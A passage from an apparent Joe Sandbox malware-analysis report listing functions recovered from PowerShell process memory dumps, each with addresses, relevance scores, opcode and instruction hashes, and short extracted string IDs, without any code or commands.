                                                                                          • Source File: 00000007.00000002.2448538060.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                          • Instruction ID: 007d259948539727f4dc2a008c28dd2baca2097d5adf60be047c909990c114ef
                                                                                          • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                          • Instruction Fuzzy Hash: F5D067B0E042099F8780EFADC94156EFBF4EB48200F6085AAD919E7301F7329A12DBD1
                                                                                          Function 04A78748 Relevance: .0, Instructions: 15COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2448538060.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4de3feb12d165d29beae5e579510ab9636a62bb6fd5894e5e69a11da3fa8ba13
                                                                                          • Instruction ID: 02337e1dc2bd23f83a48f426a43b7850b294fa68970192e788c6b266856a82fa
                                                                                          • Opcode Fuzzy Hash: 4de3feb12d165d29beae5e579510ab9636a62bb6fd5894e5e69a11da3fa8ba13
                                                                                          • Instruction Fuzzy Hash: 31D0673190410A9BCF09ABA5E85E4BDBB74FA14301F40416DDA1752191EA312A5EDEC5
                                                                                          Function 04A78810 Relevance: .0, Instructions: 15COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2448538060.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2b65320c2a90007061afa78a31718ebabba3771248f0f41ef3dd6e675e99a8d8
                                                                                          • Instruction ID: 5e2bcec40d8c4391badc84682ed785fba2fd3ba120724dcb9276876239fba9e1
                                                                                          • Opcode Fuzzy Hash: 2b65320c2a90007061afa78a31718ebabba3771248f0f41ef3dd6e675e99a8d8
                                                                                          • Instruction Fuzzy Hash: 2BD01734E0820A8B8B58EFA8E84A86EBBB5EB44301F00816EDD0993341EA306C05DFC1
                                                                                          Function 04A77EA0 Relevance: .0, Instructions: 13COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2448538060.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6600c11b76c201d577666eece7f77e1f6c02d4ead2a63ebc81a93a0d3b5f2112
                                                                                          • Instruction ID: c960d78d575313322641574e83d3b8ecef2d830d812588dcef6915bd18aa9e87
                                                                                          • Opcode Fuzzy Hash: 6600c11b76c201d577666eece7f77e1f6c02d4ead2a63ebc81a93a0d3b5f2112
                                                                                          • Instruction Fuzzy Hash: 96C04C359197800EEF22A7394CAA525AF715A5361470B47C2D881DA173DC34AC49D3A1
                                                                                          Function 04A77938 Relevance: .0, Instructions: 13COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2448538060.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 99eee7018cfd220fa1ff40bf9463804670e1846bb40f4e41e59d168071998daf
                                                                                          • Instruction ID: 101b61ca04fc899f7164b29068d50cc2872d41073b78b539d9525ac1c5b383f5
                                                                                          • Opcode Fuzzy Hash: 99eee7018cfd220fa1ff40bf9463804670e1846bb40f4e41e59d168071998daf
                                                                                          • Instruction Fuzzy Hash: C1D012394462854BCB545E3D9C464583B259B4221A75014DCE89B692B3CA73E445CB00
                                                                                          Function 04A77940 Relevance: .0, Instructions: 8COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2448538060.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4c54cbbf3dc4672f5bdd41cf6b364c7a210753211ab9e821b25a9eed0afb2531
                                                                                          • Instruction ID: e58754228e3471ff039e1c3b19b08a4460f7a1bf4e89371e05147db08a11fda6
                                                                                          • Opcode Fuzzy Hash: 4c54cbbf3dc4672f5bdd41cf6b364c7a210753211ab9e821b25a9eed0afb2531
                                                                                          • Instruction Fuzzy Hash: 26B092311897488FC2486F7AA805814732DAB4021538004E8E85E0A2A28E76E884CA44

                                                                                          Non-executed Functions

                                                                                          Function 04A74D62 Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2448538060.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Ln^$Ln^$Ln^$Ln^
                                                                                          • API String ID: 0-874246056
                                                                                          • Opcode ID: cf7bf69d5a22a97f7f6822d65468fe2007ce1ba56346730c78db40b00cf29ded
                                                                                          • Instruction ID: 93f7f63d2a068c5bd22a5d97cb1c36bdb2533a6d7259316a2a9d4b4ac1fac6fe
                                                                                          • Opcode Fuzzy Hash: cf7bf69d5a22a97f7f6822d65468fe2007ce1ba56346730c78db40b00cf29ded
                                                                                          • Instruction Fuzzy Hash: 6E416E2120E3C04FC3079B3C98A46913FB1AF9729871E40DBD5C4CF2A3D926980AC366
                                                                                          Function 04A74CB2 Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.2448538060.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_4a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Ln^$Ln^$Ln^$Ln^
                                                                                          • API String ID: 0-874246056
                                                                                          • Opcode ID: 31cf4c26597bc3bac0b4b25d0b3d77f78784771ef3c386cd65e19472b5cd9302
                                                                                          • Instruction ID: 622cd60e8a222c99ff4b24249409e039d93cb4df6d8638783c0046108d43e2f8
                                                                                          • Opcode Fuzzy Hash: 31cf4c26597bc3bac0b4b25d0b3d77f78784771ef3c386cd65e19472b5cd9302
                                                                                          • Instruction Fuzzy Hash: 6711A22650E3C14FC307873A88A91913FB5AEA7598B1E41EFC0C89F0A3D96A181F8716

                                                                                          Executed Functions

                                                                                          Function 04CDB488 Relevance: 5.3, Strings: 4, Instructions: 258COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: SU&n^$cU&n^$sU&n^$\&n^
                                                                                          • API String ID: 0-3533445758
                                                                                          • Opcode ID: 74ed6bba3d56d0114e9708d33c0871d37a7edb868e0fe9640f49a98b7c2b6aac
                                                                                          • Instruction ID: 9971fe94291d12144e341f40bd504d183691abcd2f4191acdbf35c7b58cdebcd
                                                                                          • Opcode Fuzzy Hash: 74ed6bba3d56d0114e9708d33c0871d37a7edb868e0fe9640f49a98b7c2b6aac
                                                                                          • Instruction Fuzzy Hash: 7591AEB4E017558BEB19DFB488015AEBBB3EFC4610B44892DD246AF384DF38AD058BD5
                                                                                          Function 04CDB498 Relevance: 5.3, Strings: 4, Instructions: 252COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: SU&n^$cU&n^$sU&n^$\&n^
                                                                                          • API String ID: 0-3533445758
                                                                                          • Opcode ID: c9860ae0b8eb253299f898c78ddfb015b7c650ae9e7f3304783c17179bdbe14e
                                                                                          • Instruction ID: 1df36735d5f0ce94847bb0bfa5025fea8cdf760dfba499dd234589e495f85b28
                                                                                          • Opcode Fuzzy Hash: c9860ae0b8eb253299f898c78ddfb015b7c650ae9e7f3304783c17179bdbe14e
                                                                                          • Instruction Fuzzy Hash: 55919EB4F017559BEB19EFB488015AEBBA3EFC4610B40892DD246AF344DF38AD058BD5
                                                                                          Function 07972308 Relevance: 8.1, Strings: 6, Instructions: 629COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2532667551.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_7970000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: piOk$piOk$piOk$piOk$piOk$|,Qk
                                                                                          • API String ID: 0-277957543
                                                                                          • Opcode ID: d53cf73c95b2b319f7ffeb9ec8654b637de09279e8bdae7fda8681c46d226a65
                                                                                          • Instruction ID: 0af851265356fac0f0d7dfa10b91afa4281de7bf6a073b22e9268034f75098a9
                                                                                          • Opcode Fuzzy Hash: d53cf73c95b2b319f7ffeb9ec8654b637de09279e8bdae7fda8681c46d226a65
                                                                                          • Instruction Fuzzy Hash: 3F2236B1B20206DFDB249BA885007AABBF9FFC5218F1484BAE504CF252DB75DD45C7A1
                                                                                          Function 07973CE8 Relevance: .6, Instructions: 591COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2532667551.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_7970000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 41a63cc60de8105c99796485fb82fc43a71a5c8eb0cdfbe16fc488fffe321402
                                                                                          • Instruction ID: 0cd1c6cd75f7d0b617b9c5980e1b317fa58d513de4bf8885f9a5357552db627b
                                                                                          • Opcode Fuzzy Hash: 41a63cc60de8105c99796485fb82fc43a71a5c8eb0cdfbe16fc488fffe321402
                                                                                          • Instruction Fuzzy Hash: 89126BB1704386CFDB259B78880176BBBA69FD1218F1484BAD905CF352DB72DC45C7A2
                                                                                          Function 04CD29F0 Relevance: .2, Instructions: 208COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cc83214fc54be0c63939c34a54a54c8e95748e16841617d67127b2497d8baef7
                                                                                          • Instruction ID: e325f4f8e6a4ca6abb3b14c4353d8c518f5f2fd6fe5fc348926ec872a9eae428
                                                                                          • Opcode Fuzzy Hash: cc83214fc54be0c63939c34a54a54c8e95748e16841617d67127b2497d8baef7
                                                                                          • Instruction Fuzzy Hash: 85916A74A00605DFCB15CF59C494AAEFBB2FF88310B2486A9DA15AB365C735FC51CBA0
                                                                                          Function 04CD7728 Relevance: .2, Instructions: 155COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: def54ad7fb36a63c71aab3260daffe942aaf9ba75afc881d30d211cd74a60071
                                                                                          • Instruction ID: 3441bff7ce76af339e94e2773f18e8a3ed7d1d4716a55c686d8033fec2d7edd6
                                                                                          • Opcode Fuzzy Hash: def54ad7fb36a63c71aab3260daffe942aaf9ba75afc881d30d211cd74a60071
                                                                                          • Instruction Fuzzy Hash: DC51DF347052059FD705DB69D844A2A7BE7FFC9314B15887ADA09CB352EB35EC05CBA0
                                                                                          Function 04CDBAC8 Relevance: .2, Instructions: 155COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 71bb3af20d32f725905c92ba8a1ba26aad048367999fbfb1b3bcdd54f0db1821
                                                                                          • Instruction ID: 46db8b9a0bc75d290c091ab659af57fa5d5c3f2c8f09e40426a09250b96cfedd
                                                                                          • Opcode Fuzzy Hash: 71bb3af20d32f725905c92ba8a1ba26aad048367999fbfb1b3bcdd54f0db1821
                                                                                          • Instruction Fuzzy Hash: 46610371E00209DFDB14DFA9D584A9DBBF2FF88310F15812AE919AB254EB74AD41CB60
                                                                                          Function 04CDBAB8 Relevance: .2, Instructions: 152COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f1f04b4bfd2a385469c6d1d7468320f09333f0a75f466521833647e65b281171
                                                                                          • Instruction ID: af36eee8e5ecb91db7fe67f052c244e18e02c8df5d22cbe8f13212bc6e0f3e13
                                                                                          • Opcode Fuzzy Hash: f1f04b4bfd2a385469c6d1d7468320f09333f0a75f466521833647e65b281171
                                                                                          • Instruction Fuzzy Hash: 5B510674E00248DFDB14DFA9D584A8DBBF2FF88310F15806AE919AB355EB70AD45CB60
                                                                                          Function 07973CCC Relevance: .1, Instructions: 119COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2532667551.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_7970000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cdf8f94ed1f049533b88ce4c8049ee73e7e0f42d2e9dab0bcc70851f96333093
                                                                                          • Instruction ID: 99f0e40e080ab1b0e8b86c1638e859f806d016d6aa4b3e0d0228ac1b80ba2d8a
                                                                                          • Opcode Fuzzy Hash: cdf8f94ed1f049533b88ce4c8049ee73e7e0f42d2e9dab0bcc70851f96333093
                                                                                          • Instruction Fuzzy Hash: F44129F1B00282DFCB318B58C640BAA7BE69FC4648F1484A5E904CF356E731DC45EBA2
                                                                                          Function 04CD6FC8 Relevance: .1, Instructions: 114COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a9e16b82b81888a65a876ec8da68d86500d47b2f1fe35a3960e7bfbae65f0f5e
                                                                                          • Instruction ID: 97f3197326cf3f88ac8f6703d5f6f92c1f315809cdb7def024dacee8ce064ca9
                                                                                          • Opcode Fuzzy Hash: a9e16b82b81888a65a876ec8da68d86500d47b2f1fe35a3960e7bfbae65f0f5e
                                                                                          • Instruction Fuzzy Hash: F0411C34B052048FDB18DFA4C594AAEBBF2EF8D311F1444A9E606AB391DB35ED01CB61
                                                                                          Function 04CD2B00 Relevance: .1, Instructions: 110COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 99c9b03f0c5bb0bc7d8cf0575ac8dd548bcf2ddc7ad3e6eb207b3ff5834e252f
                                                                                          • Instruction ID: 4458602309eb2ce407b8ee78126a23764b039c9c74a54291df8ff445a323bc5a
                                                                                          • Opcode Fuzzy Hash: 99c9b03f0c5bb0bc7d8cf0575ac8dd548bcf2ddc7ad3e6eb207b3ff5834e252f
                                                                                          • Instruction Fuzzy Hash: FB415B74A00105DFCB05CF49C5989AEFBB2FF88310B158699D9169B364C732FD51CB90
                                                                                          Function 04CDC390 Relevance: .1, Instructions: 101COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c6d8a2487d0cf29b6fc09b60aaa1adff93cdee785c59cbd5d9286e339b5d6170
                                                                                          • Instruction ID: b7937dbd745eabe920fbcbe8d9aa1c5b0641a6f66af48189263fbffc483bcb67
                                                                                          • Opcode Fuzzy Hash: c6d8a2487d0cf29b6fc09b60aaa1adff93cdee785c59cbd5d9286e339b5d6170
                                                                                          • Instruction Fuzzy Hash: 7531AF353002019FE709EB78D850B9ABB96EFC4251F04823DD60ACB365DFB4AC05CBA1
                                                                                          Function 04CD6FB9 Relevance: .1, Instructions: 97COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 152989eb4d0ef6b7605b7bcb9c9ca006bd38a2b56e5088d26da5fb1c32507e65
                                                                                          • Instruction ID: fc15c3998ee11841e3a80d3e155f14b616f092e8f99e76bd16520d9b706feba9
                                                                                          • Opcode Fuzzy Hash: 152989eb4d0ef6b7605b7bcb9c9ca006bd38a2b56e5088d26da5fb1c32507e65
                                                                                          • Instruction Fuzzy Hash: 9E310C34A01245CFDB15CFA4C594AAEBBF2EF8D315F1844A9D906AB3A1DB31ED01DB60
                                                                                          Function 04CDAE68 Relevance: .1, Instructions: 93COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 64f6ef357155818942df757393f9f90c2fd4d77b193cac729fc2a021b93f4066
                                                                                          • Instruction ID: d4c48881217151b1b1bd0d51e86050932e426df5ff13984df1be6d8303db3a40
                                                                                          • Opcode Fuzzy Hash: 64f6ef357155818942df757393f9f90c2fd4d77b193cac729fc2a021b93f4066
                                                                                          • Instruction Fuzzy Hash: 8B318270E002059BDB08DFB9C4847AEBBF6EF89310F148029E501EB355EB75AC41CB54
                                                                                          Function 04CDAD30 Relevance: .1, Instructions: 88COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7e1e74f2728a0f5a26fc88b24b38a9091dd63b72c4916c1d543e83b4fbbb4bcf
                                                                                          • Instruction ID: c85811d26438366f21785dc305f261f7ef6cd809baece07c136bc12e0544ca9e
                                                                                          • Opcode Fuzzy Hash: 7e1e74f2728a0f5a26fc88b24b38a9091dd63b72c4916c1d543e83b4fbbb4bcf
                                                                                          • Instruction Fuzzy Hash: 923196B4E04345DFEB04EF64D854AAE7BB2EF85300F118469D111AF395CA79AD41CF61
                                                                                          Function 04CDE1F1 Relevance: .1, Instructions: 86COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 39e488c95cea30f486fdc466bbcb2c895f28ee76b4d249ab4a25ee52ff4f8b94
                                                                                          • Instruction ID: c8db54c9d47208becc0b7db7bfcb0039aef2aa4367a96eb4c5826b81599a716f
                                                                                          • Opcode Fuzzy Hash: 39e488c95cea30f486fdc466bbcb2c895f28ee76b4d249ab4a25ee52ff4f8b94
                                                                                          • Instruction Fuzzy Hash: C2314774A00604CFDB18DF69D498AAEBBF6EF89314F044469D506EB3A0DF74AC41CB90
                                                                                          Function 04CDAE78 Relevance: .1, Instructions: 84COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9137b8d115ed3aa7711c490978dec9d2abca3ac0a1619e8849afd5eba52cb86b
                                                                                          • Instruction ID: 5ed0e235aa7d17471cb5285a24d84594a2b2844b4e14a19394777669c0c24a0b
                                                                                          • Opcode Fuzzy Hash: 9137b8d115ed3aa7711c490978dec9d2abca3ac0a1619e8849afd5eba52cb86b
                                                                                          • Instruction Fuzzy Hash: 86314970E002099FDB09DFA9D4947AEBBF6EF89310F148069E501EB354EA759C418BA4
                                                                                          Function 04CDAFA0 Relevance: .1, Instructions: 81COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 28f4ab981de4471739e4041171a67eb36610244d61a56dfd6c46fdc370b302cb
                                                                                          • Instruction ID: 7a53be9e9f7c1d9807ba5575a6d66edd5f38ad0198499ae6f7d70a5c4409920e
                                                                                          • Opcode Fuzzy Hash: 28f4ab981de4471739e4041171a67eb36610244d61a56dfd6c46fdc370b302cb
                                                                                          • Instruction Fuzzy Hash: 3C21E075A002488FCB14DFAED44079FBBF5EF88320F14846AD119E7340CB75A905CBA5
                                                                                          Function 04CD93F8 Relevance: .1, Instructions: 79COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: edd0317766792598de862d83cd73a09dd6e3a4896394b2d5dd67c23455c904eb
                                                                                          • Instruction ID: 5f49fe33b11a098553e44a8cbb854fe3b46d78e638d4a5858b92bf15e3582adc
                                                                                          • Opcode Fuzzy Hash: edd0317766792598de862d83cd73a09dd6e3a4896394b2d5dd67c23455c904eb
                                                                                          • Instruction Fuzzy Hash: 573190B89053849EDB60CF6AD08878AFFF2EF88320F28C46ED5496B206D7756441CB65
                                                                                          Function 04CDE200 Relevance: .1, Instructions: 77COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cd0f9f4ea2ba2249c8870fe85140f3d135f07b08d0b98caa0de6034057050ac6
                                                                                          • Instruction ID: 707c4f446d8864d9970590b949d9dcfd5b6c864e4ea2abc67909461ea51db27d
                                                                                          • Opcode Fuzzy Hash: cd0f9f4ea2ba2249c8870fe85140f3d135f07b08d0b98caa0de6034057050ac6
                                                                                          • Instruction Fuzzy Hash: 49312674A002048FDB18DF69D498AAEBBF6EF89314F044469D406EB390DF74AC45CB90
                                                                                          Function 04CDAD40 Relevance: .1, Instructions: 77COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b60f2f1e6e20442a9171265edd01599b1c5ae3447093f34fed38c1bfedc0b48c
                                                                                          • Instruction ID: cef5fa3294e12040596693fe6fb9e2d9ba99990e5c0d6945727282cee06717d5
                                                                                          • Opcode Fuzzy Hash: b60f2f1e6e20442a9171265edd01599b1c5ae3447093f34fed38c1bfedc0b48c
                                                                                          • Instruction Fuzzy Hash: 173132B8E00209DFEB44EF64D894AAE7BB6EF84300F118469D615AB394DB35AD418F90
                                                                                          Function 04CD9408 Relevance: .1, Instructions: 69COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 21450ce656ec02444971c640b6ac0b6fe223ea85826c8d5370f1b03b5c5dfeaf
                                                                                          • Instruction ID: 079e39f414c605196f040516dbd91d3524f47daeae084be9eff60d049907f531
